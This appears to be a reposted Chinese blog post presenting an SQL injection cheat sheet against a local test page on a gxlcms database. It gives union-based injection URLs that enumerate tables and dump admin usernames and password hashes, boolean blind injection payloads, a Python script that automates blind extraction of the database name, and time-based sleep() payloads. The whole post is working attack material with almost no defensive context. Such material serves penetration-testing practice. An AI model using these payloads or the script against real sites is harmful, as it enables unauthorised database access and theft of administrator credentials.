标签:
一:union报错注入
猜字段长度:
order by 28
先显示位
http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,9
当前数据库:
http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,database()
爆数据表:
http://127.0.0.1/sql.php?cmd=1 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,group_concat(table_name) from information_schema.tables where table_schema=‘gxlcms‘
爆字段:
http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,group_concat(column_name) from information_schema.columns where table_name=‘gxl_admin‘
出数据
http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,group_concat(admin_name,admin_pwd) from gxl_admin
二:bool盲注
数据库名是:gxlcms
判断当前数据库长度/内容
http://127.0.0.1/sql.php?cmd=1 and length(database())=6
出数据库名
http://127.0.0.1/sql.php?cmd=1 and mid(database(),2,1)=‘x‘
#coding:utf-8
#简单boole 盲注脚本
import urllib
#获取当前数据库长度,并猜解出来
url = ‘http://127.0.0.1/sql.php?cmd=1‘
payloads = ‘abcdefghijklmnopqrstuvwxyz0123456789@_.‘
table1=‘‘
for i in range(1,20):
payloadl = ‘ and length(database())=%s‘%i
html = urllib.urlopen(url+payloadl).read()
#print html
if ‘Array‘ in html:#判断语句自己修改
print "The length is %s: "%i
length = i
break
for x in range(1,length+1):
for p in payloads:
p2 = ‘ and mid(database(),%s,1)=\‘%s\‘‘ %(x,p)
r2 = urllib.urlopen(url+p2).read()
if ‘Array‘ in r2:#判断语句自己修改
table1+=p
print table1
三:时间注入
判断数据库长度
http://127.0.0.1/sql.php?cmd=1 and if(length(database())=6,sleep(5),1);
判断数据库内容:
http://127.0.0.1/sql.php?cmd=1 and if(mid(database(),1,1)=‘g‘,sleep(5),1);
时间盲注的脚本之前也写了个,将就着用吧!
标签:
原文地址:http://www.cnblogs.com/lly-001/p/5452357.html
